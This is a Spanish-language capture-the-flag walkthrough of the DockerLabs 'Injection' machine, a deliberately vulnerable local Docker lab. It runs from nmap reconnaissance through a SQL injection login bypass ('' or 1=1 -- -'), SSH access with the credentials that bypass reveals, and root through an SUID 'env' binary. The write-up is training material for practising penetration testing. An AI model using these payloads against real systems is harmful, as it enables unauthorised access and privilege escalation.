> For the complete documentation index, see [llms.txt](https://brias.gitbook.io/brias/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://brias.gitbook.io/brias/dockerlabs/dificultad-facil/injection.md).

# Injection

#### **Despliegue de la Máquina:**

**1. Descarga:**

Accedemos a la web oficial de [DockerLabs](https://dockerlabs.es/), buscamos la máquina **Injection** y pulsamos en el botón de descarga. Esto nos redirige a un enlace de Mega, desde donde descargamos un archivo comprimido que contiene tanto la imagen de la máquina como el script necesario para su ejecución.

**2. Descompresión:**

Utilizamos la herramienta `7z` para descomprimir el archivo:

```bash
7z x injection.zip
```

<figure><img src="/files/p8a2xrhNJOjo0L50Et5H" alt=""><figcaption></figcaption></figure>

**3. Ejecución:**

Ejecutamos el script `auto_deploy.sh` para desplegar la máquina en Docker:

```bash
bash auto_deploy.sh injection.tar
```

Al finalizar, el script nos proporciona la dirección IP interna de la máquina (`172.17.0.2`), que utilizaremos para interactuar con ella.

<figure><img src="/files/EeXxJB4UUB2siqfoVVs5" alt=""><figcaption></figcaption></figure>

***

#### **Reconocimiento:**

**1. Verificación de Conectividad:**

Verificamos la conectividad con la máquina utilizando el comando `ping`:

```bash
ping -c 1 172.17.0.2
```

El valor `TTL=64` indica que el sistema operativo es **Linux**.

<figure><img src="/files/v1MrwBZM6P7DOTLnC6mh" alt=""><figcaption></figcaption></figure>

**2. Escaneo de Puertos:**

**Escaneo Inicial:**

Realizamos un escaneo de puertos abiertos con `nmap`:

```bash
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 172.17.0.2 -oG allPorts
```

**Resultados:**

* **Puerto 22:** `SSH`.
* **Puerto 80:** `HTTP`.

<figure><img src="/files/F05jEnMDX3OB4PerXBaF" alt=""><figcaption></figcaption></figure>

**Escaneo Detallado:**

Ejecutamos un escaneo más exhaustivo para identificar servicios y versiones que se están ejecutando en cada uno de los puertos:

```bash
nmap -p22,80 -sCV 172.17.0.2 -oN targeted
```

**Resultados:**

* **Puerto 22:** OpenSSH 8.9p1.
* **Puerto 80:** Apache httpd 2.4.52.

<figure><img src="/files/HDXILbiJrmB9uPB5LGVh" alt=""><figcaption></figcaption></figure>

***

#### **Explotación:**

**1. Análisis del Servicio Web:**

Accedemos al servicio web vía navegador (`http://172.17.0.2`) y encontramos un panel de inicio de sesión.

<figure><img src="/files/d1uQrSRMcEMFqnq77Rgv" alt=""><figcaption></figcaption></figure>

Dado que el nombre de la máquina es **Injection**, sospechamos que es vulnerable a una **Inyección SQL**.

**2. Inyección SQL (SQLi):**

Utilizamos la siguiente entrada en los campos de usuario y contraseña para explotar la vulnerabilidad:

```sql
' or 1=1 -- -
```

**Explicación:**

* `'`: Cierra la cadena de texto en la consulta SQL.
* `or 1=1`: Siempre evalúa como verdadero, evitando la validación de credenciales.
* `-- -`: Comenta el resto de la consulta, ignorando cualquier validación adicional.

<figure><img src="/files/PKRxKqfSji9AApBK6pzG" alt=""><figcaption></figcaption></figure>

**Resultado:** La inyección es exitosa y obtenemos credenciales para conectarnos por SSH.

<figure><img src="/files/RcerAeWE2sYaCG5znRxk" alt=""><figcaption></figcaption></figure>

**3. Acceso por SSH:**

Utilizamos las credenciales obtenidas para acceder por SSH:

```bash
ssh dylan@172.17.0.2
```

<figure><img src="/files/9ZmYT701Yn0j5kXFsqqg" alt=""><figcaption></figcaption></figure>

***

#### **Escalada de Privilegios:**

**1. Búsqueda de Binarios (SUID):**

Buscamos binarios con permisos **SUID** que permitan escalar privilegios:

```bash
find / -perm -4000 2>/dev/null
```

<figure><img src="/files/ruBMT28vgIgX5dtmihR9" alt=""><figcaption></figcaption></figure>

El binario `/usr/bin/env` puede ser ejecutado como `root` sin proporcionar contraseña.

**2. Explotación con GTFOBins:**

Consultamos [GTFOBins](https://gtfobins.github.io/gtfobins/env/) para explotar el binario `env`:

```bash
/usr/bin/env /bin/sh -p
```

<figure><img src="/files/4ww9XhWOKQCRnIzTeCz4" alt=""><figcaption></figcaption></figure>

**Resultado:** Obtenemos una shell como `root`, completando la explotación de la máquina.
